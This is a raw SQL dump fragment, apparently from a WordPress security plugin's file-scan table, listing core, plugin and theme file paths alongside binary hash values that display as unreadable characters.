�','�<��=���;�:�t_,w�ăI���,�,��','',0,'?'),('�?{o_���\'�n�','wp-admin/images/resize-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{3VV��FV�f�%K','懴y2q��Z�o��~��([��`\0`C�i\ZL\'','',0,'?'),('�K����Y�����','wp-content/plugins/redirection/locale/redirection-en_NZ.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n�����a�s�1','�J�?�-!\n��:�:/�ɪ����c����O�c','',0,'?'),('���_f $�O<o','wp-admin/js/common.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�X��\0�6����	d','�۸#R�Eix��b\'ס�	��z�^0�Cy�','',0,'?'),('��LuZ;�@�Z���b�','wp-includes/wp-includes/ms-settings.php',0,'Ĉ�L�@�r#�}S���','Ĉ�L�@�r#�}S���','4n-���J���2����T�hߕ�!�_H/Z\"�','',0,'?'),('��%�\0��z�f�N�pS','wp-includes/js/tinymce/plugins/wpemoji/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SE���x=d��~���eM','\"�w�%%{���=L(���hK�\rƢH�P','',0,'?'),('�׋ˎ8�\r�R�#$9r','wp-content/plugins/wp-smushit/app/class-interface-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a���$/����','&G�O�X|�\0y�ې�d�n�?�)�65p8cL�W','',0,'?'),('��w�+\"+�$��^�','wp-content/plugins/wordfence/lib/wfLog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"W�~�SM����!','R2h�/rOr�k��_+l�fR�>�k��,R','',0,'?'),('��]�#{P�B�&{�Ƿ','wp-includes/wp-includes/js/wp-embed-template.js',0,'�lq3UN�:�9�:^E��','�lq3UN�:�9�:^E��','3R�X�o��}Q��P��b�������J��','',0,'?'),('��6U�*)u1@)\0P��','wp-includes/blocks/navigation-link/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','49�/\'�h!�?��?','I�P��%4��I��kR��7��r��#��P�f,','',0,'?'),('���cq6���Ǩ߮','wp-includes/wp-includes/js/dist/keyboard-shortcuts.min.js',0,'@J��x&H�*8�����.','@J��x&H�*8�����.','2�j��!^g^i�r3�P~�\0�K8�c��\n�','',0,'?'),('�y�-�fn6��C�','wp-content/plugins/wordpress-seo/admin/views/tabs/network/general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cw9�\'��\Zw��D�','�q�~���Ѡq/��%L�X\'�5@��\n','',0,'?'),('�#\\���/�vXR','wp-admin/js/theme.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�ѕ��[s�Nϸ~G','�{��g�]!��cj8��~z-�8k��i��','',0,'?'),('�$����Ova���8�%','wp-includes/blocks/text-columns/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.%�Q��ʯv�v~\Z,','����}òӳ��lV�_���� g�$q#3	�ǹ��','',0,'?'),('�\'^=h$���$�hF�','wp-content/plugins/wordpress-seo/js/dist/languages/id.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YG�]�>�AhJ�\r','\'3��J�e��ҧoL�P*�`�����J1u��','',0,'?'),('�Q��א�4����B|�','wp-includes/wp-includes/js/tinymce/skins/lightgray/img/anchor.gif',0,'��a5q��ȑ_4�@','��a5q��ȑ_4�@','(afo��x�D�paQ6�mtk�,���V^','',0,'?'),('�V�<��r\nQ�]jvXP','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/ProviderInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z���*Nf�ټ{��','i��˶|1���v.4[�(�����m@f>��','',0,'?'),('�V��`?wI�yl^5��','wp-content/plugins/wordfence/modules/login-security/js/jquery.tmpl.min.1647958122.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\}�\"���7ڷ��DZ','�.I�H\Z�g\0�H!7`��gޠZ�zȄ�ž6|','',0,'?'),('�_�����<D��hg��','wp-includes/block-patterns/query-offset-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���NtW42���:��','�բ}=%f|ޞ�V�ؔ�#/=ȼ�k�얜*��','',0,'?'),('�lF����c뒕�L���','wp-admin/js/iris.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�2�?ޡ�{��','�dU�D��2�����G���#���lk^[\Z�','',0,'?'),('�tm\\���H��^�M�&�','wp-content/plugins/all-in-one-wp-security-and-firewall/images/notices/new_year.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���F�.?^c����H�','�򽊏bg�&��i\ZS�;������~!ENr�','',0,'?'),('��,�o�!�z�j\"�','wp-admin/css/edit.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�h�n�}��7\" � 0','G�XU2jO�W��i��q7�5\'��nT�6�,�l','',0,'?'),('�ؠ]�f���P��','wp-content/plugins/wordfence/lib/wfLockedOut.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z��6/N���','\'$��{���i�P\'\ZTBP�<�Pp���W��','',0,'?'),('����^@��9���','wp-includes/blocks/read-more/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','у�[��	x\0~�0�W�','L��;H�o��B��d���J�G�݁I�u��','',0,'?'),('�Qq^��&�\'����|�','wp-includes/wp-includes/widgets/class-wp-widget-tag-cloud.php',0,'��x̭&�b�+|eS�݂','��x̭&�b�+|eS�݂','�,��ɼ?��?�	p�f\0qO��_���&N9','',0,'?'),('�N�����s�','wp-includes/customize/class-wp-customize-custom-css-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�H(t����)�G9�','O/`d;���]��z��#���΁lQ�g�f�	','',0,'?'),('��n�(���.nk`zY','wp-content/plugins/wordpress-seo/src/conditionals/admin/estimated-reading-time-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3m9$��P��FYd�:�','�	#xo���\n�P)��䖙\"g~�<�ڜ�x','',0,'?'),('��\0L������6�','wp-includes/blocks/latest-posts/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6N>M�#CJ��U��','߲�>�8�m*�L��ܢ���F���Eq%���','',0,'?'),('���uUܵ�S�5�m!','wp-content/themes/hitmag/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u��͈�����w�wK','���:($K��Ѽ�y�Ϗ�7b���f㓶��','',0,'?'),('��S�A@=�Y���v','wp-content/plugins/wp-cerber/nexus/cerber-slave-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� -4D妬���M.�','�v�����{e��FG�z�43��`���n','',0,'?'),('�����➞��^՘R�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o������h�g[','��߁.�-h4`9S _\r�)I�(��W��','',0,'?'),('�$%$Z�)�S��R','wp-content/plugins/wp-fastest-cache/js/lang/sv.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:i��<\Z/���h','E������0�T�b5�Ff����^�`�ʰ�','',0,'?'),('�8��U2�T�Me��','wp-content/plugins/wordpress-seo/src/integrations/third-party/amp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','벨@+�ɑ\Z~�G5 wr','���\n�_��w*Pz���*Z#�4�w,L�ue��','',0,'?'),('�V��k9۴�s���ֿ','wp-admin/css/customize-controls-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ϊI-���A(�߫�{F','����Ӷ���v��d�NC`��uz\"9��D','',0,'?'),('���;�^𩸴8c�','wp-includes/css/buttons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[��\\���.�','Lێ��b����3���y����~�>�I�t���','',0,'?'),('�\rYE(����Xz�%�','wp-content/plugins/wp-smushit/app/views/bulk/upgrade-meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yT�Q�(�n�����7','\\^r��� �����y@n9��s��G���','',0,'?'),('��}2�ѪWYq��;a{','wp-content/plugins/wordpress-seo/src/config/semrush-client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ʓ�A0������','Ǝ&���ʺHj����ߐ��pM����Aw','',0,'?'),('�(�Կ��ɶ۾�趮','wp-includes/js/dist/edit-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��`8i��ߣ)h�','p�?�t��~�QW�/��P�r�9S��]+V z','',0,'?'),('�5Q�mW�p\\:_�H�','wp-content/plugins/wp-smushit/app/assets/images/icons-rtl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0���50�B�7/c��/','赼ٍ?,�:ִ�j�q%+��SM�ق�(','',0,'?'),('�B0�DP`^�\'A혈b','wp-content/plugins/wp-cerber/assets/flags/tk.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t���s��c�K���','�n��Ģ\n�-��4�n�zW�a�5{Q$<��B��b�','',0,'?'),('�J\'#��rN�0a\r�','wp-includes/images/crystal/audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nV�:�ω�G��-#k','�~B\Z-׼�of|W�x\\��|�M�)���ˢ','',0,'?'),('�Vt$�_se~!B���B','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/dsb.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JƯ�uC`��v�ۗt','�W��\'�yN���{)\n�5\Z�y\"ٿ,L��','',0,'?'),('�Y��R�Yi/��l@HX�','wp-includes/js/media-grid.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'��O�믧k���','g�z��0�\nD%Nj2�WU�]��Hf��ٻ&��','',0,'?'),('�Z��Q�!����*�','wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xGIzQXKMnyrYk.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`y\0#x�s�G�J��t��','�A�r���x?j����#��C�F�O�G-�S�$','',0,'?'),('�]�И\n�(�?W&\\�','wp-includes/blocks/audio/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �҃�9�0��6n	�',' �B5��e7�	?,�����Bv�*G/�\'&@','',0,'?'),('�o��7�����8��\\�','wp-content/themes/hitmag/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�ars����b\n�,','�[�;����M�2� Vhp�m�DH��XW�R','',0,'?'),('�w�>d��?d�','wp-includes/blocks/post-featured-image/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?iq���b�Ҋ��$	�','�\"_x�U��:��t+\nm���dgP�19C$','',0,'?'),('􌙭3p�=�Ym�}�ۑ','wp-includes/wp-includes/default-filters.php',0,'���=��B/˥oH:z','���=��B/˥oH:z','G�$�������q��ԑZ}\n�F�TB�刔','',0,'?'),('�7:�b��\r,�ja�','wp-includes/js/dist/blocks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`I43�Ә�3�:��','l�l��X��S��ϒ�J�o�&�/�e� ','',0,'?'),('�	��ge�Ψ2�','wp-content/themes/twentytwentythree/parts/header.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�.e�˯��[KOP','t��Ͳ�b�/u����n;��*���9\"M�t��','',0,'?'),('��f�	W5\ra�R�\nK','wp-includes/rest-api/endpoints/class-wp-rest-templates-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\�K�=6+<+W�\\*�','V���b�z��Y}\\{��]\"\"#���%(x�v','',0,'?'),('�zZ�f���ip^�2׎','wp-includes/js/mediaelement/mediaelement.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w�\Z����x5+�.c�','��D�R�y��\n��:�t�ƴ��7��C@�W','',0,'?'),('�j�8���ď�\Z���','wp-includes/js/wp-backbone.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J��T	��l�Q��1','\nT��x��N�@��s_��L`�E*�d���H�c?','',0,'?'),('�¾�h֙ѽj���ﲰ','wp-includes/blocks/comment-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o���\\O�mtu\0��','\r��� �i�x�j����s����2;��T��','',0,'?'),('�棭s�� t�yg)�','wp-includes/wp-includes/sodium_compat/src/Core32/Poly1305.php',0,'�@Bg�EJ�ƽH�','�@Bg�EJ�ƽH�','i��|\\I����E����_��X綈j��','',0,'?'),('�<n�J�|X�Ci@:','wp-content/plugins/wordpress-seo/src/integrations/duplicate-post-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{���2�{�u	:6�C','��s\"�Ҍ�Ngh�Y�ř�/g�e.��~j','',0,'?'),('�^3w\nyމ��','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-locked-ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ЄW���td>�)','Ίa����AcZ�����\"g8�>h�.@��Cs','',0,'?'),('�\0�d:c\Z6}����e','wp-includes/wp-includes/css/admin-bar.min.css',0,'L�7w��R��«���','L�7w��R��«���','9���\0*Ǔ��]S���J_>+=J�-�AoC','',0,'?'),('��CFC�T/ڮ+:`','wp-includes/blocks/comments-pagination-numbers/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���́�V{�}�^θ0','P!/�&\\������߉��WDGx�G0����','',0,'?'),('���]�R>�w.�EQ','wp-includes/sodium_compat/src/Core/Curve25519/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��ϛ�vj��\n���','�S�x�^�V>m�!-�q���D�eV�����','',0,'?'),('�(T/I�����e�vB','wp-includes/blocks/table/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��O��j���W���','���/[�6\'}�OUJo$���+:AQU','',0,'?'),('��:k^R�4�>A�g�','wp-includes/wp-includes/js/dist/autop.min.js',0,'��# 狌6�Qq<6','��# 狌6�Qq<6','\r39�5��.��c��Ⴅ�F�\"Ӄy^u�\0^','',0,'?'),('�!�֐(yJo*��J�','wp-content/plugins/wordfence/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�\\�BH+����)	','��84E�3I6-����9���!z��G�L�5','',0,'?'),('�)�#j�d��S���eʋ','wp-includes/js/jquery/ui/effect-shake.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"H:�y���O�a�?��','G-%1A��e��ʐU�e,b�$-c�$�','',0,'?'),('�*�1�G鍫v�Lߟn�','wp-includes/sodium_compat/src/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z���\"��И\rC6�','u��\n�@݌.��R���#j��!Y�IW��','',0,'?'),('�-\"D��ʹD�5a�/','wp-includes/cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��xpE@\'l{ٰ�Ċ','3;3����v#4)��	㒹��q��C�W���n� ','',0,'?'),('�A4e���{�^����Z','wp-includes/js/wpdialog.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ʒy\n	� ep�ԩf','��!/�A��f�0=��G�7�h�/�uU�&g��','',0,'?'),('�F��\Z����C��1�P','wp-content/plugins/wordfence/lib/wfDict.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y� L���Z!bE��l�','����.{0Je��{�5-���~[T�$Ğ','',0,'?'),('�Lyɒ\"\\H�ڛ��%e','wp-content/plugins/wp-cerber/assets/flags/pm.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VI�T���\n���','9���>H,?f�?��d��cg�J�z݁B�','',0,'?'),('�Z/ǜE)b�8!&��e','wp-content/plugins/wp-cerber/languages/wp-cerber-ja.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.\\c6��N!5M��','�Xv�?�v�\\�hD�E�����X@�a\n�','',0,'?'),('�c}b��fɰ܀�y�B','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Grant/Password.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n��q���<�7��','\n��Zn�B��8)���C\'g��jW�M���xi','',0,'?'),('�f� ���(7�j�','wp-content/plugins/wordpress-seo/images/link-in-icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m�4t��1D���','��?ӽp���M�R���\nI�����m�#�','',0,'?'),('�u�N���.A_�_�','wp-includes/js/media-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@4Va�ˣ������','���9�R����\r��Ʋo[�N�K��š*h��','',0,'?'),('�|�*w/\ZT�*�6��bJ','wp-content/plugins/wordpress-seo/src/integrations/third-party/web-stories.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��վ0�(���w��\"8','en�0��\r^녶�d�倲��E�f�<����_','',0,'?'),('��(���w��S��O','wp-content/plugins/wordpress-seo/src/integrations/front-end/handle-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>z���M.�\n��\0�','0ގ/�UC*�@�vq��И��/s��i\rF�','',0,'?'),('���Cڝ�e�S�\\\'Ea','wp-content/plugins/wp-fastest-cache/js/lang/it.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��㭘j�ȩA����','�����.&֛P��ǝ�s�86rH5:�>���G','',0,'?'),('��)Q\n�?�O�a�r��','wp-includes/blocks/comment-reply-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<N�n�5�>\\��','l����q��K��`���v�\0���b���','',0,'?'),('���&�`�;�i��','wp-content/plugins/wordfence/css/wf-global.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ADmqc��v��d9','�(O��ӛˀԟMAW��D�0޳�\\��5LG�','',0,'?'),('���p]S�\nڮ��sE�','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/is.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ȄL�	rVV�mʸ�V!','�L� �����0&�>��|Ÿ�N_�|hE�q','',0,'?'),('����X{���p	��1{','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-sv_SE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e/Z �%�}��`�','?�Ѕ �ܹ\Z�#�9��D!��N�*!uo�t','',0,'?'),('������>+ܞL[�m','wp-includes/js/tinymce/skins/lightgray/img/anchor.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a5q��ȑ_4�@','(afo��x�D�paQ6�mtk�,���V^','',0,'?'),('���(��%�#�9yn','wp-admin/css/forms.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b��7��c���=ݙ','H��L��ku=Zԓ-�\n����U��l�{L��','',0,'?'),('��o��bBr�j3#\r��','wp-content/plugins/wordfence/waf/pomo/entry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';²iGQ���A���w','79]���#�/��r�bC�te\\c���ߏ��P','',0,'?'),('��D���6�S�/�cQ�?','wp-includes/customize/class-wp-customize-background-position-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+	]\r-W�ҽ���','2j��ˏ��jB��\\�Cv���q���,�\'��F�','',0,'?'),('��K}:�a<��U�+#','wp-content/plugins/wordpress-seo/lib/migrations/table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tʷzՑ����O�?V','��3�t<)�����l���hbY�tZX?bm^','',0,'?'),('��{Z\n�0D\rO�M*Ut�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/GeoIp2Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N	�S�X�?z���','���Ԧ\n�ٲLK�Y���1�%�X7�~�*','',0,'?'),('�ȉm���m��^m�B#','wp-content/plugins/wordpress-seo/inc/class-wpseo-statistics.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����e���T#�W��','��ݦ��؄t9\Zb�k�~poMl�\\;2�7�Q�','',0,'?'),('����y��\0�\"��Q','wp-admin/user/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�V�����������','��m�\r�)��h0�E�C���N��`�D[	$3','',0,'?'),('��(��\Z�vdv�Q�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/Stream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h^��K��y$�y��.','w��Z�ï�]�k6<D��.<����Mf�\ZǮ�','',0,'?'),('��~������r�C��','wp-admin/link-parse-opml.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����xa۔2���F','�%�vP|X��:�x�>�]|��y|��:���','',0,'?'),('�\r�B�Uҕ�H���v�','wp-includes/wp-includes/js/dist/block-directory.js',0,':-��q���?b׍�^�',':-��q���?b׍�^�','f2\"�c`��}�`��·����֑��ѕl�o','',0,'?'),('�j��Z�;\nlГ�','wp-includes/random_compat/random.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\X��0%=݈A!��','bZG~�u��&\r坯1楃/�+/i����','',0,'?'),('�\r�y�R�]�x���\\','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-settings-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g܋�4�I�~�J�^','*\0����\rCa��j���X��Z�̣�','',0,'?'),('�$����R\\�r-�y','wp-content/plugins/wp-cerber/languages/wp-cerber-fr_FR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��zd\Z��0!mqq5�','E��-&�I�	�)N�?���ei}Z������\0�','',0,'?'),('�$�ş a0����','wp-includes/wp-includes/class-walker-page-dropdown.php',0,'�tB�B2�[eJ��5�a','�tB�B2�[eJ��5�a','Y�Ds4��I<����A�t�ȃ���\Z��G���.','',0,'?'),('�\'�*��P��*5��o�','wp-includes/wp-includes/class-wp-rewrite.php',0,'�c���x�X��C��u%#','�c���x�X��C��u%#','ݐ/#N`j�R�1�t+��s�W�]�~S���mǗ','',0,'?'),('�.%��\r�=�j�����','wp-content/plugins/wordpress-seo/css/dist/featured-image-1851-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�.�	N�|8��b��','�Ī+4c�]�F��	�v�+��D��E&','',0,'?'),('�6ҹtyԥGЁ��','wp-includes/wp-includes/css/editor-rtl.css',0,'b��d�(�*ț��K��','b��d�(�*ț��K��','���$��l#��X#u��>�G�j�I;ߗ߮','',0,'?'),('�:�u?͜PF��{S�M�','wp-content/plugins/wp-cerber/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�ց�L?��$�p���','��\0��s�W�Hk���P��Xq�?�2,�\0','',0,'?'),('�C{��k���f�_��','wp-content/plugins/wordfence/js/admin.liveTraffic.1647958122.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڗU�_|�$>���7','wR�u�sXq��s�a�OFvQ�y�Ł#���','',0,'?'),('�KF\nO�i�},�w�','wp-includes/random_compat/byte_safe_strings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sٹ��x3�8C�f�5�c','���L$�k���㈼����O!F��h[�Śڟ','',0,'?'),('�V9��K���goX��7�','wp-admin/images/align-left-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�8�O�����^��c','$kb�>�����k&�:	ڂa�7��Zcdm��%','',0,'?'),('�W#:��V��^H3X','wp-includes/blocks/nextpage/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�`�\ZJ������$�','O��1NJ8���#���C�\\({xSzW\'L�','',0,'?'),('�^Cy>E���.�MU�','wp-content/themes/hitmag/inc/kirki/core/class-kirki-setting-user-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�|M#<ޣ,C?�>$','���7�������}��>V,��� :�=�m','',0,'?'),('�o�w1�k;ӗ`���','wp-includes/wp-includes/js/tw-sack.min.js',0,'�7�X��wO��qa','�7�X��wO��qa','k�\r<�I�-�Vsp�6gb4eb���fs�Ҹ��','',0,'?'),('�o�;r��V�J�e<��','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/media-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U�&�M��L�q^�','M8��S�:�Q���	wO�����@SU�','',0,'?'),('�{�p�\0bu���:{��','wp-content/plugins/wp-cerber/assets/flags/bo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C$<C�@��SYRt���','�~.�L��w\0���}�m�P<��s=\0� ��1[','',0,'?'),('�����H�S!;� �','wp-admin/js/user-profile.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�H��)E��Ji��','Ʒ�1�����ю�`��s�k��=a:i�a�','',0,'?'),('��9�xc�˜��T�N�T','wp-content/plugins/wordpress-seo/src/deprecated/admin/ajax/class-yoast-onpage-ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',h]��*Z\nO��wz�','��(�@xF�.\rw�ܤ�F2o\\d\'QN��]���Ӻ','',0,'?'),('���k��7l�lۄa�B','wp-includes/wp-includes/css/dist/format-library/style-rtl.css',0,'�6���F۔�\'�V��','�6���F۔�\'�V��','�h�}����]�ާ֚��$_8Znyi�E�4V����','',0,'?'),('��@�}�~�4G�v<�m','wp-includes/sodium_compat/src/Core32/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�b�f>���=���','����ߺ�`�\'���盱��Жx#i���#�','',0,'?'),('���+���q�pW��','wp-includes/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���zE��˙p��','�9��H����$�0�iߣ�p���6�d\0','',0,'?'),('���`�&X<�aQ�Vh\\','wp-admin/user/profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x8��!���x�S�j','��J���f�v^�D�w�ۦ\n��s�Bu�/���L','',0,'?'),('��#��T��q�۩�\\�','wp-content/themes/hitmag/template-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǩ/%u�/:K���M)','\n��s0��g؈8%��z�1�`�g��	��k2r�','',0,'?'),('��yY)h��N��Á�','wp-includes/js/dist/customize-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S����D)�A=�(J','.ШWn\'8���,8�hv���\"j*��,�3�','',0,'?'),('���Pq-�t�@l�','wp-includes/images/wlw/wp-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1	�ʚ�7w3K��*','5 ��}�x(��r�:a,zmK�H1|/��+��','',0,'?'),('���D0!24���4','wp-includes/wp-includes/js/wp-util.min.js',0,'�R�H��OZ\'�]1�T','�R�H��OZ\'�]1�T','���;@�O0,�KG#�&h0�RҘ�6�0���T','',0,'?'),('�	���)�&��Z��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/gl.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&N�����D��67','ڭ`�2�>hܡ��]zp��Q��8��i�Fpb','',0,'?'),('��gx�A�Ȣ}�g�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]ኮ���ȣ&','��K��#�@JU�}F�����,���![','',0,'?'),('� @�;��*�|��','wp-includes/Text/Diff/Engine/string.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':��=�M��\0��i)','����d��[�%�nZR��`������','',0,'?'),('�C�:��U8>���h&�h','wp-content/plugins/wordpress-seo/src/integrations/front-end/force-rewrite-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Wl/G���zf�L','�H���-�.�ge�WEx�r�sLVM��~��','',0,'?'),('�j��	-��cFo�k��','wp-includes/wp-includes/locale.php',0,'�Ʋ\04�)o�ybU^�','�Ʋ\04�)o�ybU^�','�<�6n�\'�J�����_��	�S%��GVJ','',0,'?'),('�q��bl�C�!Ұ','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/pt.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$����Z%������','��S��f׶���@V�l��)/��A','',0,'?'),('�x��\r���B��','wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Fe.php',0,'�W�	��,��~�r�','�W�	